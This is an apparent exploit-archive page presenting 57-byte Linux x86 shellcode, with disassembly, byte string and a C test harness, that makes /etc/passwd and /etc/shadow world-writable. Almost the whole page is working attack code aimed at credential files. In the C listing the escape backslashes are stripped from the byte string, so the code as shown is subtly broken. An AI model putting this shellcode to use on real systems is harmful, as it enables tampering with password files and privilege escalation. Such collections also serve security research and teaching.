[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
# Published : 2012-08-02
# Author :
# Previous Title : ARM Loader Port 0x1337
# Next Title : Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes
/*
Title: Linux x86 chmod 666 /etc/passwd & /etc/shadow - 57 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web: http://0xffe4.org
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 66 b9 b6 01 mov $0x1b6,%cx
8048066: 50 push %eax
8048067: 68 73 73 77 64 push $0x64777373
804806c: 68 2f 2f 70 61 push $0x61702f2f
8048071: 68 2f 65 74 63 push $0x6374652f
8048076: 89 e3 mov %esp,%ebx
8048078: b0 0f mov $0xf,%al
804807a: cd 80 int $0x80
804807c: 31 c0 xor %eax,%eax
804807e: 50 push %eax
804807f: 68 61 64 6f 77 push $0x776f6461
8048084: 68 2f 2f 73 68 push $0x68732f2f
8048089: 68 2f 65 74 63 push $0x6374652f
804808e: 89 e3 mov %esp,%ebx
8048090: b0 0f mov $0xf,%al
8048092: cd 80 int $0x80
8048094: 31 c0 xor %eax,%eax
8048096: 40 inc %eax
8048097: cd 80 int $0x80
*/
#include <stdio.h>
char shellcode[] = "x31xc0x66xb9xb6x01x50x68x73x73x77x64"
"x68x2fx2fx70x61x68x2fx65x74x63x89xe3"
"xb0x0fxcdx80x31xc0x50x68x61x64x6fx77"
"x68x2fx2fx73x68x68x2fx65x74x63x89xe3"
"xb0x0fxcdx80x31xc0x40xcdx80";
int main()
{
fprintf(stdout,"Lenght: %dn",strlen(shellcode));
(*(void (*)()) shellcode)();
}